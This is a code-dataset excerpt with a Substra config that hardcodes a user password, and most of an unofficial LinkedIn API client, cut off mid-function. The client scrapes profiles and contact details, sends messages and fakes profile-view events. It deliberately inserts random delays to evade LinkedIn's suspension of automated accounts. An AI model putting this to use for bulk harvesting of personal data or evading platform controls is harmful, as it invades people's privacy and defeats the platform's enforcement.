ext (stringclasses, 9 values) | sha (stringlengths, 40) | content (stringlengths, 3 to 1.04M)
---|---|---
py | 7dfff5fb6637a5f9b25472610d34e22f1af78de5 | # Copyright 2018 Owkin, inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
SUBSTRA_PATH = os.getenv('SUBSTRA_PATH', '/substra')
user = {
'name': 'user-owkin',
'pass': 'user-owkinpw',
'home': f'{SUBSTRA_PATH}/data/orgs/owkin/user',
'cert': f'{SUBSTRA_PATH}/data/orgs/owkin/user/msp/signcerts/cert.pem',
'private_key': f'{SUBSTRA_PATH}/data/orgs/owkin/user/msp/keystore/key.pem',
}
|
py | 7dfff60f047325248e58a31f8ca8138707c36b5e | """
Provides linkedin api-related code
"""
import json
import logging
import random
from operator import itemgetter
from time import sleep, time
from urllib.parse import urlencode, quote
from linkedin_api.client import Client
from linkedin_api.utils.helpers import (
get_id_from_urn,
get_update_author_name,
get_update_old,
get_update_content,
get_update_author_profile,
get_update_url,
append_update_post_field_to_posts_list,
parse_list_raw_urns,
parse_list_raw_posts,
get_list_posts_sorted_without_promoted,
)
logger = logging.getLogger(__name__)
def default_evade():
"""
A catch-all method to try and evade suspension from Linkedin.
    Currently, just delays the request by a random (bounded) time
    """
    sleep(random.randint(2, 5))  # sleep a random duration to try and evade suspension
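# A hedged sketch of an alternative evade strategy: the request helpers below
# accept an `evade` callable, so a caller could plug in a longer, jittered
# delay instead of the default fixed 2-5 second sleep. This helper is purely
# illustrative and not part of the library itself.
def jittered_evade(base_delay=3.0, jitter=2.0):
    """Sleep for `base_delay` seconds plus a random fractional jitter."""
    sleep(base_delay + random.random() * jitter)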
class Linkedin(object):
"""
Class for accessing the LinkedIn API.
:param username: Username of LinkedIn account.
:type username: str
:param password: Password of LinkedIn account.
:type password: str
"""
_MAX_UPDATE_COUNT = 100 # max seems to be 100
_MAX_SEARCH_COUNT = 49 # max seems to be 49, and min seems to be 2
_MAX_REPEATED_REQUESTS = (
200 # VERY conservative max requests count to avoid rate-limit
)
def __init__(
self,
username,
password,
*,
authenticate=True,
refresh_cookies=False,
debug=False,
proxies={},
cookies=None,
cookies_dir=None,
):
"""Constructor method"""
self.client = Client(
refresh_cookies=refresh_cookies,
debug=debug,
proxies=proxies,
cookies_dir=cookies_dir,
)
logging.basicConfig(level=logging.DEBUG if debug else logging.INFO)
self.logger = logger
if authenticate:
if cookies:
# If the cookies are expired, the API won't work anymore since
# `username` and `password` are not used at all in this case.
self.client._set_session_cookies(cookies)
else:
self.client.authenticate(username, password)
def _fetch(self, uri, evade=default_evade, base_request=False, **kwargs):
"""GET request to Linkedin API"""
evade()
url = f"{self.client.API_BASE_URL if not base_request else self.client.LINKEDIN_BASE_URL}{uri}"
return self.client.session.get(url, **kwargs)
def _post(self, uri, evade=default_evade, base_request=False, **kwargs):
"""POST request to Linkedin API"""
evade()
url = f"{self.client.API_BASE_URL if not base_request else self.client.LINKEDIN_BASE_URL}{uri}"
return self.client.session.post(url, **kwargs)
def search(self, params, limit=-1, offset=0):
"""Perform a LinkedIn search.
:param params: Search parameters (see code)
:type params: dict
:param limit: Maximum length of the returned list, defaults to -1 (no limit)
:type limit: int, optional
:param offset: Index to start searching from
:type offset: int, optional
:return: List of search results
:rtype: list
"""
count = Linkedin._MAX_SEARCH_COUNT
if limit is None:
limit = -1
results = []
while True:
# when we're close to the limit, only fetch what we need to
if limit > -1 and limit - len(results) < count:
count = limit - len(results)
default_params = {
"count": str(count),
"filters": "List()",
"origin": "GLOBAL_SEARCH_HEADER",
"q": "all",
"start": len(results) + offset,
"queryContext": "List(spellCorrectionEnabled->true,relatedSearchesEnabled->true,kcardTypes->PROFILE|COMPANY)",
}
default_params.update(params)
res = self._fetch(
f"/search/blended?{urlencode(default_params, safe='(),')}",
headers={"accept": "application/vnd.linkedin.normalized+json+2.1"},
)
data = res.json()
new_elements = []
elements = data.get("data", {}).get("elements", [])
for i in range(len(elements)):
new_elements.extend(elements[i]["elements"])
# not entirely sure what extendedElements generally refers to - keyword search gives back a single job?
# new_elements.extend(data["data"]["elements"][i]["extendedElements"])
results.extend(new_elements)
# break the loop if we're done searching
# NOTE: we could also check for the `total` returned in the response.
# This is in data["data"]["paging"]["total"]
if (
(
limit > -1 and len(results) >= limit
) # if our results exceed set limit
or len(results) / count >= Linkedin._MAX_REPEATED_REQUESTS
) or len(new_elements) == 0:
break
self.logger.debug(f"results grew to {len(results)}")
return results
def search_people(
self,
keywords=None,
connection_of=None,
network_depths=None,
current_company=None,
past_companies=None,
nonprofit_interests=None,
profile_languages=None,
regions=None,
industries=None,
schools=None,
contact_interests=None,
service_categories=None,
include_private_profiles=False, # profiles without a public id, "Linkedin Member"
# Keywords filter
keyword_first_name=None,
keyword_last_name=None,
keyword_title=None, # `keyword_title` and `title` are the same. We kept `title` for backward compatibility. Please only use one of them.
keyword_company=None,
keyword_school=None,
network_depth=None, # DEPRECATED - use network_depths
title=None, # DEPRECATED - use keyword_title
**kwargs,
):
"""Perform a LinkedIn search for people.
:param keywords: Keywords to search on
:type keywords: str, optional
:param current_company: A list of company URN IDs (str)
:type current_company: list, optional
:param past_companies: A list of company URN IDs (str)
:type past_companies: list, optional
:param regions: A list of geo URN IDs (str)
:type regions: list, optional
:param industries: A list of industry URN IDs (str)
:type industries: list, optional
:param schools: A list of school URN IDs (str)
:type schools: list, optional
:param profile_languages: A list of 2-letter language codes (str)
:type profile_languages: list, optional
:param contact_interests: A list containing one or both of "proBono" and "boardMember"
:type contact_interests: list, optional
:param service_categories: A list of service category URN IDs (str)
:type service_categories: list, optional
:param network_depth: Deprecated, use `network_depths`. One of "F", "S" and "O" (first, second and third+ respectively)
:type network_depth: str, optional
:param network_depths: A list containing one or many of "F", "S" and "O" (first, second and third+ respectively)
:type network_depths: list, optional
:param include_private_profiles: Include private profiles in search results. If False, only public profiles are included. Defaults to False
:type include_private_profiles: boolean, optional
:param keyword_first_name: First name
:type keyword_first_name: str, optional
:param keyword_last_name: Last name
:type keyword_last_name: str, optional
:param keyword_title: Job title
:type keyword_title: str, optional
:param keyword_company: Company name
:type keyword_company: str, optional
:param keyword_school: School name
:type keyword_school: str, optional
:param connection_of: Connection of LinkedIn user, given by profile URN ID
:type connection_of: str, optional
:return: List of profiles (minimal data only)
:rtype: list
"""
filters = ["resultType->PEOPLE"]
if connection_of:
filters.append(f"connectionOf->{connection_of}")
if network_depths:
filters.append(f'network->{"|".join(network_depths)}')
elif network_depth:
filters.append(f"network->{network_depth}")
if regions:
filters.append(f'geoUrn->{"|".join(regions)}')
if industries:
filters.append(f'industry->{"|".join(industries)}')
if current_company:
filters.append(f'currentCompany->{"|".join(current_company)}')
if past_companies:
filters.append(f'pastCompany->{"|".join(past_companies)}')
if profile_languages:
filters.append(f'profileLanguage->{"|".join(profile_languages)}')
if nonprofit_interests:
filters.append(f'nonprofitInterest->{"|".join(nonprofit_interests)}')
if schools:
filters.append(f'schools->{"|".join(schools)}')
if service_categories:
filters.append(f'serviceCategory->{"|".join(service_categories)}')
# `Keywords` filter
keyword_title = keyword_title if keyword_title else title
if keyword_first_name:
filters.append(f"firstName->{keyword_first_name}")
if keyword_last_name:
filters.append(f"lastName->{keyword_last_name}")
if keyword_title:
filters.append(f"title->{keyword_title}")
if keyword_company:
filters.append(f"company->{keyword_company}")
if keyword_school:
filters.append(f"school->{keyword_school}")
params = {"filters": "List({})".format(",".join(filters))}
if keywords:
params["keywords"] = keywords
data = self.search(params, **kwargs)
results = []
for item in data:
if not include_private_profiles and "publicIdentifier" not in item:
continue
results.append(
{
"urn_id": get_id_from_urn(item.get("targetUrn")),
"distance": item.get("memberDistance", {}).get("value"),
"public_id": item.get("publicIdentifier"),
"tracking_id": get_id_from_urn(item.get("trackingUrn")),
}
)
return results
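    # Hypothetical usage sketch (kept as comments so the class body stays
    # intact); the credentials, keywords and geo URN below are made up:
    #
    #   api = Linkedin("user@example.com", "password")
    #   people = api.search_people(keywords="data engineer",
    #                              regions=["103644278"], limit=10)
    #   for person in people:
    #       print(person["public_id"], person["distance"])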
def search_companies(self, keywords=None, **kwargs):
"""Perform a LinkedIn search for companies.
:param keywords: A list of search keywords (str)
:type keywords: list, optional
:return: List of companies
:rtype: list
"""
filters = ["resultType->COMPANIES"]
params = {
"filters": "List({})".format(",".join(filters)),
"queryContext": "List(spellCorrectionEnabled->true)",
}
if keywords:
params["keywords"] = keywords
data = self.search(params, **kwargs)
results = []
for item in data:
if item.get("type") != "COMPANY":
continue
results.append(
{
"urn": item.get("targetUrn"),
"urn_id": get_id_from_urn(item.get("targetUrn")),
"name": item.get("title", {}).get("text"),
"headline": item.get("headline", {}).get("text"),
"subline": item.get("subline", {}).get("text"),
}
)
return results
def search_jobs(
self,
keywords=None,
companies=None,
experience=None,
job_type=None,
job_title=None,
industries=None,
location_name=None,
remote=True,
listed_at=86400,
limit=-1,
offset=0,
**kwargs,
):
"""Perform a LinkedIn search for jobs.
:param keywords: Search keywords (str)
:type keywords: str, optional
:param companies: A list of company URN IDs (str)
:type companies: list, optional
:param experience: A list of experience levels, one or many of "1", "2", "3", "4", "5" and "6" (internship, entry level, associate, mid-senior level, director and executive, respectively)
:type experience: list, optional
        :param job_type: A list of job types, one or many of "F", "C", "P", "T", "I", "V", "O" (full-time, contract, part-time, temporary, internship, volunteer and "other", respectively)
:type job_type: list, optional
:param job_title: A list of title URN IDs (str)
:type job_title: list, optional
:param industries: A list of industry URN IDs (str)
:type industries: list, optional
:param location_name: Name of the location to search within
:type location_name: str, optional
:param remote: Whether to include remote jobs. Defaults to True
:type remote: boolean, optional
:return: List of jobs
:rtype: list
"""
count = Linkedin._MAX_SEARCH_COUNT
if limit is None:
limit = -1
params = {}
if keywords:
params["keywords"] = keywords
filters = ["resultType->JOBS"]
if companies:
filters.append(f'company->{"|".join(companies)}')
if experience:
filters.append(f'experience->{"|".join(experience)}')
if job_type:
filters.append(f'jobType->{"|".join(job_type)}')
if job_title:
filters.append(f'title->{"|".join(job_title)}')
if industries:
filters.append(f'industry->{"|".join(industries)}')
if location_name:
filters.append(f'locationFallback->{"|".join(location_name)}')
if remote:
filters.append(f"commuteFeatures->f_WRA")
results = []
while True:
# when we're close to the limit, only fetch what we need to
if limit > -1 and limit - len(results) < count:
count = limit - len(results)
default_params = {
"decorationId": "com.linkedin.voyager.deco.jserp.WebJobSearchHitWithSalary-14",
"count": count,
"filters": f"List({filters})",
"origin": "JOB_SEARCH_RESULTS_PAGE",
"q": "jserpFilters",
"start": len(results) + offset,
"queryContext": "List(primaryHitType->JOBS,spellCorrectionEnabled->true)",
}
default_params.update(params)
res = self._fetch(
f"/search/hits?{urlencode(default_params, safe='(),')}",
headers={"accept": "application/vnd.linkedin.normalized+json+2.1"},
)
data = res.json()
elements = data.get("included", [])
results.extend(
[
i
for i in elements
if i["$type"] == "com.linkedin.voyager.jobs.JobPosting"
]
)
# break the loop if we're done searching
# NOTE: we could also check for the `total` returned in the response.
# This is in data["data"]["paging"]["total"]
if (
(
limit > -1 and len(results) >= limit
) # if our results exceed set limit
or len(results) / count >= Linkedin._MAX_REPEATED_REQUESTS
) or len(elements) == 0:
break
self.logger.debug(f"results grew to {len(results)}")
return results
def get_profile_contact_info(self, public_id=None, urn_id=None):
"""Fetch contact information for a given LinkedIn profile. Pass a [public_id] or a [urn_id].
:param public_id: LinkedIn public ID for a profile
:type public_id: str, optional
:param urn_id: LinkedIn URN ID for a profile
:type urn_id: str, optional
:return: Contact data
:rtype: dict
"""
res = self._fetch(
f"/identity/profiles/{public_id or urn_id}/profileContactInfo"
)
data = res.json()
contact_info = {
"email_address": data.get("emailAddress"),
"websites": [],
"twitter": data.get("twitterHandles"),
"birthdate": data.get("birthDateOn"),
"ims": data.get("ims"),
"phone_numbers": data.get("phoneNumbers", []),
}
websites = data.get("websites", [])
for item in websites:
if "com.linkedin.voyager.identity.profile.StandardWebsite" in item["type"]:
item["label"] = item["type"][
"com.linkedin.voyager.identity.profile.StandardWebsite"
]["category"]
elif "" in item["type"]:
item["label"] = item["type"][
"com.linkedin.voyager.identity.profile.CustomWebsite"
]["label"]
del item["type"]
contact_info["websites"] = websites
return contact_info
def get_profile_skills(self, public_id=None, urn_id=None):
"""Fetch the skills listed on a given LinkedIn profile.
:param public_id: LinkedIn public ID for a profile
:type public_id: str, optional
:param urn_id: LinkedIn URN ID for a profile
:type urn_id: str, optional
:return: List of skill objects
:rtype: list
"""
params = {"count": 100, "start": 0}
res = self._fetch(
f"/identity/profiles/{public_id or urn_id}/skills", params=params
)
data = res.json()
skills = data.get("elements", [])
for item in skills:
del item["entityUrn"]
return skills
def get_profile(self, public_id=None, urn_id=None):
"""Fetch data for a given LinkedIn profile.
:param public_id: LinkedIn public ID for a profile
:type public_id: str, optional
:param urn_id: LinkedIn URN ID for a profile
:type urn_id: str, optional
:return: Profile data
:rtype: dict
"""
# NOTE this still works for now, but will probably eventually have to be converted to
# https://www.linkedin.com/voyager/api/identity/profiles/ACoAAAKT9JQBsH7LwKaE9Myay9WcX8OVGuDq9Uw
res = self._fetch(f"/identity/profiles/{public_id or urn_id}/profileView")
data = res.json()
if data and "status" in data and data["status"] != 200:
self.logger.info("request failed: {}".format(data["message"]))
return {}
# massage [profile] data
profile = data["profile"]
if "miniProfile" in profile:
if "picture" in profile["miniProfile"]:
profile["displayPictureUrl"] = profile["miniProfile"]["picture"][
"com.linkedin.common.VectorImage"
]["rootUrl"]
images_data = profile["miniProfile"]["picture"][
"com.linkedin.common.VectorImage"
]["artifacts"]
for img in images_data:
w, h, url_segment = itemgetter(
"width", "height", "fileIdentifyingUrlPathSegment"
)(img)
profile[f"img_{w}_{h}"] = url_segment
profile["profile_id"] = get_id_from_urn(profile["miniProfile"]["entityUrn"])
profile["profile_urn"] = profile["miniProfile"]["entityUrn"]
profile["member_urn"] = profile["miniProfile"]["objectUrn"]
del profile["miniProfile"]
del profile["defaultLocale"]
del profile["supportedLocales"]
del profile["versionTag"]
del profile["showEducationOnProfileTopCard"]
# massage [experience] data
experience = data["positionView"]["elements"]
for item in experience:
if "company" in item and "miniCompany" in item["company"]:
if "logo" in item["company"]["miniCompany"]:
logo = item["company"]["miniCompany"]["logo"].get(
"com.linkedin.common.VectorImage"
)
if logo:
item["companyLogoUrl"] = logo["rootUrl"]
del item["company"]["miniCompany"]
profile["experience"] = experience
# massage [education] data
education = data["educationView"]["elements"]
for item in education:
if "school" in item:
if "logo" in item["school"]:
item["school"]["logoUrl"] = item["school"]["logo"][
"com.linkedin.common.VectorImage"
]["rootUrl"]
del item["school"]["logo"]
profile["education"] = education
# massage [languages] data
languages = data["languageView"]["elements"]
for item in languages:
del item["entityUrn"]
profile["languages"] = languages
# massage [publications] data
publications = data["publicationView"]["elements"]
for item in publications:
del item["entityUrn"]
for author in item.get("authors", []):
del author["entityUrn"]
profile["publications"] = publications
# massage [certifications] data
certifications = data["certificationView"]["elements"]
for item in certifications:
del item["entityUrn"]
profile["certifications"] = certifications
# massage [volunteer] data
volunteer = data["volunteerExperienceView"]["elements"]
for item in volunteer:
del item["entityUrn"]
profile["volunteer"] = volunteer
# massage [honors] data
honors = data["honorView"]["elements"]
for item in honors:
del item["entityUrn"]
profile["honors"] = honors
return profile
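    # Hypothetical usage sketch (comments only; the public id is made up).
    # The display picture comes back as a root URL plus per-size path
    # segments, so a full image URL can be assembled like this:
    #
    #   profile = api.get_profile(public_id="some-public-id")
    #   if "displayPictureUrl" in profile and "img_400_400" in profile:
    #       picture_url = profile["displayPictureUrl"] + profile["img_400_400"]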
def get_profile_connections(self, urn_id):
"""Fetch first-degree connections for a given LinkedIn profile.
:param urn_id: LinkedIn URN ID for a profile
:type urn_id: str
:return: List of search results
:rtype: list
"""
return self.search_people(connection_of=urn_id, network_depth="F")
    def get_company_updates(
        self, public_id=None, urn_id=None, max_results=None, results=None
    ):
"""Fetch company updates (news activity) for a given LinkedIn company.
:param public_id: LinkedIn public ID for a company
:type public_id: str, optional
:param urn_id: LinkedIn URN ID for a company
:type urn_id: str, optional
:return: List of company update objects
:rtype: list
"""
        if results is None:  # avoid a shared mutable default accumulating across calls
            results = []
        params = {
            "companyUniversalName": public_id or urn_id,
"q": "companyFeedByUniversalName",
"moduleKey": "member-share",
"count": Linkedin._MAX_UPDATE_COUNT,
"start": len(results),
}
res = self._fetch(f"/feed/updates", params=params)
data = res.json()
if (
len(data["elements"]) == 0
or (max_results is not None and len(results) >= max_results)
or (
max_results is not None
and len(results) / max_results >= Linkedin._MAX_REPEATED_REQUESTS
)
):
return results
results.extend(data["elements"])
self.logger.debug(f"results grew: {len(results)}")
return self.get_company_updates(
public_id=public_id,
urn_id=urn_id,
results=results,
max_results=max_results,
)
    def get_profile_updates(
        self, public_id=None, urn_id=None, max_results=None, results=None
    ):
"""Fetch profile updates (newsfeed activity) for a given LinkedIn profile.
:param public_id: LinkedIn public ID for a profile
:type public_id: str, optional
:param urn_id: LinkedIn URN ID for a profile
:type urn_id: str, optional
:return: List of profile update objects
:rtype: list
"""
        if results is None:  # avoid a shared mutable default accumulating across calls
            results = []
        params = {
            "profileId": public_id or urn_id,
"q": "memberShareFeed",
"moduleKey": "member-share",
"count": Linkedin._MAX_UPDATE_COUNT,
"start": len(results),
}
res = self._fetch(f"/feed/updates", params=params)
data = res.json()
if (
len(data["elements"]) == 0
or (max_results is not None and len(results) >= max_results)
or (
max_results is not None
and len(results) / max_results >= Linkedin._MAX_REPEATED_REQUESTS
)
):
return results
results.extend(data["elements"])
self.logger.debug(f"results grew: {len(results)}")
return self.get_profile_updates(
public_id=public_id,
urn_id=urn_id,
results=results,
max_results=max_results,
)
def get_current_profile_views(self):
"""Get profile view statistics, including chart data.
:return: Profile view data
:rtype: dict
"""
res = self._fetch(f"/identity/wvmpCards")
data = res.json()
return data["elements"][0]["value"][
"com.linkedin.voyager.identity.me.wvmpOverview.WvmpViewersCard"
]["insightCards"][0]["value"][
"com.linkedin.voyager.identity.me.wvmpOverview.WvmpSummaryInsightCard"
][
"numViews"
]
def get_school(self, public_id):
"""Fetch data about a given LinkedIn school.
:param public_id: LinkedIn public ID for a school
:type public_id: str
:return: School data
:rtype: dict
"""
params = {
"decorationId": "com.linkedin.voyager.deco.organization.web.WebFullCompanyMain-12",
"q": "universalName",
"universalName": public_id,
}
res = self._fetch(f"/organization/companies?{urlencode(params)}")
data = res.json()
if data and "status" in data and data["status"] != 200:
self.logger.info("request failed: {}".format(data))
return {}
school = data["elements"][0]
return school
def get_company(self, public_id):
"""Fetch data about a given LinkedIn company.
:param public_id: LinkedIn public ID for a company
:type public_id: str
:return: Company data
:rtype: dict
"""
params = {
"decorationId": "com.linkedin.voyager.deco.organization.web.WebFullCompanyMain-12",
"q": "universalName",
"universalName": public_id,
}
res = self._fetch(f"/organization/companies", params=params)
data = res.json()
if data and "status" in data and data["status"] != 200:
self.logger.info("request failed: {}".format(data["message"]))
return {}
company = data["elements"][0]
return company
def get_conversation_details(self, profile_urn_id):
"""Fetch conversation (message thread) details for a given LinkedIn profile.
:param profile_urn_id: LinkedIn URN ID for a profile
:type profile_urn_id: str
:return: Conversation data
:rtype: dict
"""
# passing `params` doesn't work properly, think it's to do with List().
# Might be a bug in `requests`?
res = self._fetch(
f"/messaging/conversations?\
keyVersion=LEGACY_INBOX&q=participants&recipients=List({profile_urn_id})"
)
data = res.json()
item = data["elements"][0]
item["id"] = get_id_from_urn(item["entityUrn"])
return item
def get_conversations(self):
"""Fetch list of conversations the user is in.
:return: List of conversations
:rtype: list
"""
params = {"keyVersion": "LEGACY_INBOX"}
res = self._fetch(f"/messaging/conversations", params=params)
return res.json()
def get_conversation(self, conversation_urn_id):
"""Fetch data about a given conversation.
:param conversation_urn_id: LinkedIn URN ID for a conversation
:type conversation_urn_id: str
:return: Conversation data
:rtype: dict
"""
res = self._fetch(f"/messaging/conversations/{conversation_urn_id}/events")
return res.json()
def send_message(self, message_body, conversation_urn_id=None, recipients=None):
"""Send a message to a given conversation.
        :param message_body: Message text to send
:type message_body: str
:param conversation_urn_id: LinkedIn URN ID for a conversation
:type conversation_urn_id: str, optional
:param recipients: List of profile urn id's
:type recipients: list, optional
        :return: Error state. If True, an error occurred.
:rtype: boolean
"""
params = {"action": "create"}
if not (conversation_urn_id or recipients):
self.logger.debug("Must provide [conversation_urn_id] or [recipients].")
return True
message_event = {
"eventCreate": {
"value": {
"com.linkedin.voyager.messaging.create.MessageCreate": {
"body": message_body,
"attachments": [],
"attributedBody": {
"text": message_body,
"attributes": [],
},
"mediaAttachments": [],
}
}
}
}
if conversation_urn_id and not recipients:
res = self._post(
f"/messaging/conversations/{conversation_urn_id}/events",
params=params,
data=json.dumps(message_event),
)
elif recipients and not conversation_urn_id:
message_event["recipients"] = recipients
message_event["subtype"] = "MEMBER_TO_MEMBER"
payload = {
"keyVersion": "LEGACY_INBOX",
"conversationCreate": message_event,
}
res = self._post(
f"/messaging/conversations",
params=params,
data=json.dumps(payload),
)
return res.status_code != 201
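    # Hypothetical usage sketch (comments only; the URN values are made up).
    # Note that `send_message` returns an *error* flag, so True means failure:
    #
    #   failed = api.send_message("Hello!", conversation_urn_id="2-abc123==")
    #   if failed:
    #       api.logger.warning("message was not sent")
    #
    #   # or start a new thread by passing profile URN ids instead:
    #   failed = api.send_message("Hello!", recipients=["ACoAAA..."])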
def mark_conversation_as_seen(self, conversation_urn_id):
"""Send 'seen' to a given conversation.
:param conversation_urn_id: LinkedIn URN ID for a conversation
:type conversation_urn_id: str
        :return: Error state. If True, an error occurred.
:rtype: boolean
"""
payload = json.dumps({"patch": {"$set": {"read": True}}})
res = self._post(
f"/messaging/conversations/{conversation_urn_id}", data=payload
)
return res.status_code != 200
def get_user_profile(self, use_cache=True):
"""Get the current user profile. If not cached, a network request will be fired.
:return: Profile data for currently logged in user
:rtype: dict
"""
me_profile = self.client.metadata.get("me")
if not self.client.metadata.get("me") or not use_cache:
res = self._fetch(f"/me")
me_profile = res.json()
# cache profile
self.client.metadata["me"] = me_profile
return me_profile
def get_invitations(self, start=0, limit=3):
"""Fetch connection invitations for the currently logged in user.
:param start: How much to offset results by
:type start: int
:param limit: Maximum amount of invitations to return
:type limit: int
:return: List of invitation objects
:rtype: list
"""
params = {
"start": start,
"count": limit,
"includeInsights": True,
"q": "receivedInvitation",
}
res = self._fetch(
f"{self.client.API_BASE_URL}/relationships/invitationViews",
params=params,
)
if res.status_code != 200:
return []
response_payload = res.json()
return [element["invitation"] for element in response_payload["elements"]]
def reply_invitation(
self, invitation_entity_urn, invitation_shared_secret, action="accept"
):
"""Respond to a connection invitation. By default, accept the invitation.
:param invitation_entity_urn: URN ID of the invitation
:type invitation_entity_urn: int
:param invitation_shared_secret: Shared secret of invitation
:type invitation_shared_secret: str
:param action: "accept" or "reject". Defaults to "accept"
:type action: str, optional
:return: Success state. True if successful
:rtype: boolean
"""
invitation_id = get_id_from_urn(invitation_entity_urn)
params = {"action": action}
payload = json.dumps(
{
"invitationId": invitation_id,
"invitationSharedSecret": invitation_shared_secret,
"isGenericInvitation": False,
}
)
res = self._post(
f"{self.client.API_BASE_URL}/relationships/invitations/{invitation_id}",
params=params,
data=payload,
)
return res.status_code == 200
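    # Hypothetical usage sketch (comments only): accept every pending
    # invitation by combining `get_invitations` with `reply_invitation`.
    # The `entityUrn`/`sharedSecret` field names are assumptions about the
    # invitation payload:
    #
    #   for invite in api.get_invitations(limit=10):
    #       api.reply_invitation(
    #           invitation_entity_urn=invite["entityUrn"],
    #           invitation_shared_secret=invite["sharedSecret"],
    #           action="accept",
    #       )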
def remove_connection(self, public_profile_id):
"""Remove a given profile as a connection.
:param public_profile_id: public ID of a LinkedIn profile
:type public_profile_id: str
:return: Error state. True if error occurred
:rtype: boolean
"""
res = self._post(
f"/identity/profiles/{public_profile_id}/profileActions?action=disconnect",
headers={"accept": "application/vnd.linkedin.normalized+json+2.1"},
)
return res.status_code != 200
def track(self, eventBody, eventInfo):
payload = {"eventBody": eventBody, "eventInfo": eventInfo}
res = self._post(
"/li/track",
base_request=True,
headers={
"accept": "*/*",
"content-type": "text/plain;charset=UTF-8",
},
data=json.dumps(payload),
)
return res.status_code != 200
def view_profile(
self,
target_profile_public_id,
target_profile_member_urn_id=None,
network_distance=None,
):
"""View a profile, notifying the user that you "viewed" their profile.
Provide [target_profile_member_urn_id] and [network_distance] to save 2 network requests and
speed up the execution of this function.
:param target_profile_public_id: public ID of a LinkedIn profile
:type target_profile_public_id: str
:param network_distance: How many degrees of separation exist e.g. 2
:type network_distance: int, optional
:param target_profile_member_urn_id: member URN id for target profile
:type target_profile_member_urn_id: str, optional
:return: Error state. True if error occurred
:rtype: boolean
"""
me_profile = self.get_user_profile()
if not target_profile_member_urn_id:
profile = self.get_profile(public_id=target_profile_public_id)
target_profile_member_urn_id = int(get_id_from_urn(profile["member_urn"]))
if not network_distance:
profile_network_info = self.get_profile_network_info(
public_profile_id=target_profile_public_id
)
network_distance = int(
profile_network_info["distance"]
.get("value", "DISTANCE_2")
.split("_")[1]
)
viewer_privacy_setting = "F"
me_member_id = me_profile["plainId"]
client_application_instance = self.client.metadata["clientApplicationInstance"]
eventBody = {
"viewerPrivacySetting": viewer_privacy_setting,
"networkDistance": network_distance,
"vieweeMemberUrn": f"urn:li:member:{target_profile_member_urn_id}",
"profileTrackingId": self.client.metadata["clientPageInstanceId"],
"entityView": {
"viewType": "profile-view",
"viewerId": me_member_id,
"targetId": target_profile_member_urn_id,
},
"header": {
"pageInstance": {
"pageUrn": "urn:li:page:d_flagship3_profile_view_base",
"trackingId": self.client.metadata["clientPageInstanceId"],
},
"time": int(time()),
"version": client_application_instance["version"],
"clientApplicationInstance": client_application_instance,
},
"requestHeader": {
"interfaceLocale": "en_US",
"pageKey": "d_flagship3_profile_view_base",
"path": f"/in/{target_profile_member_urn_id}/",
"referer": "https://www.linkedin.com/feed/",
},
}
return self.track(
eventBody,
{
"appId": "com.linkedin.flagship3.d_web",
"eventName": "ProfileViewEvent",
"topicName": "ProfileViewEvent",
},
)
def get_profile_privacy_settings(self, public_profile_id):
"""Fetch privacy settings for a given LinkedIn profile.
:param public_profile_id: public ID of a LinkedIn profile
:type public_profile_id: str
:return: Privacy settings data
:rtype: dict
"""
res = self._fetch(
f"/identity/profiles/{public_profile_id}/privacySettings",
headers={"accept": "application/vnd.linkedin.normalized+json+2.1"},
)
if res.status_code != 200:
return {}
data = res.json()
return data.get("data", {})
def get_profile_member_badges(self, public_profile_id):
"""Fetch badges for a given LinkedIn profile.
:param public_profile_id: public ID of a LinkedIn profile
:type public_profile_id: str
:return: Badges data
:rtype: dict
"""
res = self._fetch(
f"/identity/profiles/{public_profile_id}/memberBadges",
headers={"accept": "application/vnd.linkedin.normalized+json+2.1"},
)
if res.status_code != 200:
return {}
data = res.json()
return data.get("data", {})
def get_profile_network_info(self, public_profile_id):
"""Fetch network information for a given LinkedIn profile.
:param public_profile_id: public ID of a LinkedIn profile
:type public_profile_id: str
:return: Network data
:rtype: dict
"""
res = self._fetch(
f"/identity/profiles/{public_profile_id}/networkinfo",
headers={"accept": "application/vnd.linkedin.normalized+json+2.1"},
)
if res.status_code != 200:
return {}
data = res.json()
return data.get("data", {})
def unfollow_entity(self, urn_id):
"""Unfollow a given entity.
:param urn_id: URN ID of entity to unfollow
:type urn_id: str
:return: Error state. Returns True if error occurred
:rtype: boolean
"""
payload = {"urn": f"urn:li:fs_followingInfo:{urn_id}"}
res = self._post(
"/feed/follows?action=unfollowByEntityUrn",
headers={"accept": "application/vnd.linkedin.normalized+json+2.1"},
data=json.dumps(payload),
)
err = False
if res.status_code != 200:
err = True
return err
def _get_list_feed_posts_and_list_feed_urns(
self, limit=-1, offset=0, exclude_promoted_posts=True
):
"""Get a list of URNs from feed sorted by 'Recent' and a list of yet
unsorted posts, each one of them containing a dict per post.
:param limit: Maximum length of the returned list, defaults to -1 (no limit)
:type limit: int, optional
:param offset: Index to start searching from
:type offset: int, optional
:param exclude_promoted_posts: Exclude from the output promoted posts
:type exclude_promoted_posts: bool, optional
:return: List of posts and list of URNs
:rtype: (list, list)
"""
_PROMOTED_STRING = "Promoted"
_PROFILE_URL = f"{self.client.LINKEDIN_BASE_URL}/in/"
l_posts = []
l_urns = []
# If count>100 API will return HTTP 400
count = Linkedin._MAX_UPDATE_COUNT
if limit == -1:
limit = Linkedin._MAX_UPDATE_COUNT
# 'l_urns' equivalent to other functions 'results' variable
l_urns = []
while True:
# when we're close to the limit, only fetch what we need to
if limit > -1 and limit - len(l_urns) < count:
count = limit - len(l_urns)
params = {
"count": str(count),
"q": "chronFeed",
"start": len(l_urns) + offset,
}
res = self._fetch(
f"/feed/updatesV2",
params=params,
headers={"accept": "application/vnd.linkedin.normalized+json+2.1"},
)
"""
Response includes two keya:
- ['Data']['*elements']. It includes the posts URNs always
properly sorted as 'Recent', including yet sponsored posts. The
downside is that fetching one by one the posts is slower. We will
save the URNs to later on build a sorted list of posts purging
promotions
- ['included']. List with all the posts attributes, but not sorted as
'Recent' and including promoted posts
"""
l_raw_posts = res.json().get("included", {})
l_raw_urns = res.json().get("data", {}).get("*elements", [])
l_new_posts = parse_list_raw_posts(
l_raw_posts, self.client.LINKEDIN_BASE_URL
)
l_posts.extend(l_new_posts)
l_urns.extend(parse_list_raw_urns(l_raw_urns))
# break the loop if we're done searching
# NOTE: we could also check for the `total` returned in the response.
# This is in data["data"]["paging"]["total"]
if (
